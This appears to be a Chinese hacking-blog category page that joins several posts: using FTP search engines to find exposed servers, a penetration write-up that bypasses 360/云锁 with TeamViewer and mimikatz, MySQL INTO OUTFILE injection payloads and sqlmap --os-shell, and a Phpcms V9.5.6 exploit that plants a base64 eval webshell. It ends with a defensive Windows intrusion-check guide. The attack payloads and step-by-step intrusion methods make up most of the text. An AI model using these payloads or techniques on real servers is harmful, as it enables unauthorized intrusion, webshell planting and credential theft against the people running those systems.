分类 大马技术 下的文章

目录浏览漏洞的产生是由于服务器没有配置而导致的,利用谷歌能搜索出这样的网站,然后攻击。用过这项技术的朋友应该都会发现,搜索到的很多网站权限最高的也就是把数据库下载下来,而对于服务器端的脚本文件是无法下载的,而且打开以后是空白,源代码,也无法看到,当然网站的体系结构也可以探测到,这对于我们得到webslishell来说是非常的容易,但是离最高权限还是有一定的距离。

其实我们可以利用FTP搜索引擎就可以找到大量提供FTP功能的网站,如果服务器不在线,就会提示离线,我如果需要用户名及密码,就会提示需要账号,快照一般来说是可以直接进入的,不过也有可能由于各种原因会登陆不了。

随便打开一个IP地址,成功的进入了对方的服务器了,而且这样说出来的服务器要比使用目录浏览搜索出来的网站大很多,目录浏览搜索得来的并没有进入对方的服务器,而利用FTP搜索是直接进入服务器,上面的所有文件是可以下载的。

1.jpg

搜索这样的服务器也需要关键字,而关键字是需要自己构造的。我们都知道一般服务器时会安装第三方软件,所以可以搜索第三方软件来查找特定的服务器。

我们来搜索数据库连接文件。

我们来搜索数据库连接文件,看看效果,一样可以得到非常多的服务器。

我们可以搜索Pcanywhere,在得到了安装Pcanywhere五,软件的服务器之后,就可以访问硬盘内的cif文件,把它下载下来,就得到了管理员的密码,我还可以搜索Serv-U,然后通过修改它的ini文件,然后加上具有执行权限的用户,之后FTP连接上提升权限就可以了。

2.jpg

利用FTP文件搜索引擎得到的是服务器,我用谷歌搜索出来的是网站,所以FTP搜索权限要大得多,在我们进入服务器之后,不仅可以查看运行在该服务器上的网站的任何东西,而且还可以得到其他的一些敏感信息,更为严重的是,那些文件都可以下载,这样就可以不用得到webslishell了,而是直接进入服务器把第三方敏感文件下载下来,然后连接该服务器就可以了,当然最高权限也就可唾手可得了。

黑客技术小贴士:想不想在系统时间的位置显示自己的名字或者个性的话呢?如果你喜欢这样的话,可以在控制版面里找到区域和语言选项,单机去学校中的自定义,切换到时间选项卡中,把时间格式改为tt h:mm:ss,然后把上午和下午都改为自己喜欢的文字,并且确定就可以了。

这次是危险漫步帮朋友做的一个服务器渗透测试,要求是拿下整个服务器!过程还算复杂吧!现在分享给大家用来做技术研究与学习之用~~~

OK,现在直接步入正题!

首先来给大家介绍一下这个服务器的安全防护,这次的目标服务器上安装有360和云锁防护软件,所以想要快速的拿下基本上是不太可能了,只能一步一步的来,慢慢的突破他的防线!

1.发掘漏洞,利用漏洞打好开局第一枪

找呀找,终于找到了一个漏洞,好嘞!直接执行“whoami”命令

1.png

还不错,是个administrator权限。

接下来就进入尝试输入阶段,第一个尝试属于的命令当然是“dir”,结果发现无法显示内容,没办法了,只能用“cmd/c”来突破这个限制,OK,这下成功显示我们的目录了啊!

2.png

3.png

接下来当我想更加深入一点的查看盘符内容的时候,突然发现:“内容无法显示”

4.png

尴尬了~~~,不过各位朋友如果真的遇见这种问题的话不用怕,直接加一个“”就可以了。知识点啊,得记下来!!OK,现在成功执行了。

5.png

2.常识命令阶段结束,现在开始长传木马

二话不说直接上木马

6.png
好了,二话不说也就直接失败了,因为服务器限制了写入,就是说现在服务器不可以写入,但是可以进行下载。所以我现在就直接进行远程下载。

7.png

下载完成之后,挺好!!就是没发现缓存文件~~呵呵,安全防护做得挺好!!

8.png
3.突破安全防护软件

在上传木马失败之后,我就开始认真的查看了一下进程,发现了管理员安装了我们之前就提到的360与云锁防护~~不过没关系,360正是绿帽子黑客的圣地,难道我还能怕了他!!

不过在服务器上还是有所斩获的,比如;csc.exe(csc.exe是微软.NET Framework 中的C#语言编译器)

9.png

有了上述的重大发现之后我心中已经有了全盘的计划了,我只需要写入下载代码并且执行下载TeamViewer 软件就可以直接链接服务器

不过首先要说一下,我们现在需要下载的俩个东西一个是TeamViewer软件。还有一个小程序是获取服务器的TeamViewer 远程连接的地址和密码。

10.png

11.png

13.png
OK,接下来我们就需要运行teamviewer,并且查看进程。

13.png

非常顺啊!现在已经可以开始获取密码了啊!

14.png

完全没毛病啊老铁!直接就可以连接了啊!

15.png

OK,现在链接成功了,不过电脑变成了黑屏状态!!这里说明了这个管理员还是有两把刷子的,安全防护做的也还算到位!

16.png

既然你管理员这么利害的话,那么我就直接利用你的管理身份直接完成登录不就得了吗!!还省的麻烦!!

接下来我就需要获取服务器的用户名与密码,第一步就是直接将服务器的哈希值全部都下载下来,然后再通过mimikatz.exe。来获取到管理员的用户名与密码。因为服务是Windows2003。所以要在虚拟机中的Windows2003中执行。

OK,规划已经出来了,那么我就直接实操吧!!

首先从服务器端下载哈希密码

17.png

利用mimikatz获取。如果不知道怎么利用mimikatz获取的话可以去百度搜一搜,上面都是有详细的介绍的,所以在这里我也就不再做过多的介绍了哈!!

18.png

OK,接下来我们只需要在Windows2003中执行就可以了。好了,成功获取到用户名与密码。

19.png

好了,密码也拿到了,现在直接远程登录,整个服务器已经被我拿下!!

20.png

过程可能略微有点曲折,但是黑客技术就是在不断的尝试中积累。所以不要害怕失败,失败了就换个姿势再来一次,多换几次必然会有一次是能够成功的!!

利用需要满足以下条件:
root权限
GPC关闭(能使用单引号)
有绝对路径(读文件可以不用,写文件必须)
没有配置–secure-file-priv
1.union

id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’%23
1
id=2) union select 1,2,3,4,5,6,7,'<? phpinfo(); ?>’ into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’%23
<? phpinfo(); ?>为写入的内容可添加自己的一句话 /home/wwwroot/lu4n.com/luan_phpinfo.php 为已存在的网站目录下的文件即插入文件名
2.no union

id=2) into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’ fields terminated by ‘<? phpinfo(); ?>’%23
1
id=2) into outfile ‘/home/wwwroot/lu4n.com/luan_phpinfo.php’ fields terminated by ‘<? phpinfo(); ?>’%23
第二种方法最早最早是在吐司的一个 2015-1-24 的帖子里看到的,吐司果然大牛多。
效果如下:
1.png
这里用的第二种方法是通过插入分隔符号来getshell的,所以必须查询结果有多个列
一般情况下的注入点都是符合条件的。
sqlmap利用方法
以luan_test.php为例:

<?php

@$link= mysql_connect("localhost","root","");
mysql_select_db("mysql",$link);
$user = strtolower($_GET['user']);
if(strpos($user,"union") === false){
    $sql= "SELECT * FROM user where user='{$user}'";
    echo $sql . '<br>';
    mysql_query($sql);
    echo mysql_errno() . ": " . mysql_error(). " ";
}

?>

<?php

@$link= mysql_connect("localhost","root","");
mysql_select_db("mysql",$link);
$user = strtolower($_GET['user']);
if(strpos($user,"union") === false){
    $sql= "SELECT * FROM user where user='{$user}'";
    echo $sql . '<br>';
    mysql_query($sql);
    echo mysql_errno() . ": " . mysql_error(). " ";
}

?>
经测试,sqlmap最新版实际是支持这个方法的:

C:luansqlmap>python sqlmap.py -u “http://192.168.2.200/luan_test.php?user=root” –os-shell
1
C:luansqlmap>python sqlmap.py -u “http://192.168.2.200/luan_test.php?user=root” –os-shell

但是,如果–os-shell用不了,sqlmap有个写文件的选项,经测试不成功。。。。
3.png
也就是说,sqlmap只能传自己的webshell
4.png
如果工具党遇到这种情况,直接使用sqlmap –os-shell然后用sqlmap上传的Webshell来操作就可以了。
5.png

简要描述:
低权限后台拿shell
版本:Phpcms V9.5.6 Release 20140522
详细说明:
前提是需要有管理专题的权限
测试版本
PHPCMS程序版本:Phpcms V9.5.6 Release 20140522
过程
添加专题专题名称:test
专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:
生成静态:是
<?php file_put_contents(‘0.php’,base64_decode(‘PD9waHAgQGV2YWwoJF9QT1NUWzVdKTs/Pg==’)); ?>
专题生成目录:test000
专题子分类:test test
其他默认 -> 提交
1.jpg

  1. 再次添加专题
    专题名称:test1

专题横幅:/1.jpg
专题缩略图:/1.jpg
专题导读:
生成静态:是
专题生成目录:test111
专题子分类:test test
扩展设置
专题模板:value设置为../../../../html/special/test000/index
其他默认 -> 提交
2.jpg
3.jpg
会在根目录下面生成 0.php 内容为 <?php @eval($_POST[5]);?>
漏洞证明:
4.jpg

1 准备工作

检查人员应该可以物理接触可疑的系统。因为黑客可能侦测到你可以在检查系统,例如网络监听,所以物理接触会比远程控制更好。

为了当做法庭证据可能需要将硬盘做实体备份。如果需要,断开所有与可疑机器的网络连接。

做入侵检查时,检查人员需要一台PC对检查的过程进行检查项目的结果记录。

请维护可疑服务器人员或者PC使用人员来配合,来确定机器上运行的服务和安装的软件,便于安全检查人员提交检查的效率和准确性。

2 基本检查点

检测不正常账户

查找被新增的账号,特别是管理员群组的(Administrators group)里的新增账户。

C:lusrmgr.msc

C:>net localgroup administrators

C:>net localgroup administrateurs

查找隐藏的文件

在系统文件夹里查看最近新建的文件,比如C:Windowssystem32.

C:>dir /S /A:H

检查注册表启动项

在Windoows 注册表里查看开机启动项是否正常,特别一下注册表项:

HKLMSoftwareMicrosoftWindowsCurrentVersionRun

HKLMSoftwareMicrosoftWindowsCurrentVersionRunonce

HKLMSoftwareMicrosoftWindowsCurrentVersionRunonceEx

检查不正常的服务

检查所有运行的服务,是否存在伪装系统服务和未知服务,查看可执行文件的路径。

检查账户启动文件夹

例如:Windows Server 2008

C:UsersAdministratorAppDataRoamingMicrosoftWindowsStartMenuProgramsStartup

查看正在连接的会话

C:net use

检查计算机与网络上的其它计算机之间的会话

C:net session

检查Netbios连接

C:nbtstat –S

检查系统不正常网络连接

C:netstat –nao 5

检查自动化任务

 检查计划任务清单中未知的计划

 C:\at

检查windows日志中的异常

检查防火墙、杀毒软件的事件,或任何可疑的记录。

检查大量的登入尝试错误或是被封锁的账户。
www服务器导入Web访问日志,并查看分析Web访问日志是否完整有攻击痕迹。

检查www目录是否存在webshell网页木马,重点检查类似upload目录。

3.检查木马和后门

关于检查高级的木马和后门应依次检查这几项:启动项、进程、模块、内核、服务函数、联网情。使用工具更进一步检查隐藏木马和后门程序,可以使用PChunter

打开界面点击进程,我先对进程进行排查,随便选中一个进程右键菜单点击校验所有数字签名,pchunter会以不同的颜色来显示不同的进程种类。

1.png
数字签名是微软的进程:黑色

数字签名非微软的进程:蓝色

微软的进程,如果有些模块是非微软的:土黄色

没有签名的模块:粉红色

可疑进程,隐藏服务、被挂钩函数:红色

重点对数字签名不是微软的进程和驱动排查,尤其是无签名斌并隐藏服务、被挂钩的函数的进程和驱动,如:

2.png
对此驱动文件比较怀疑,可以右键点击pchunter在线分析上传到virscan扫描一下。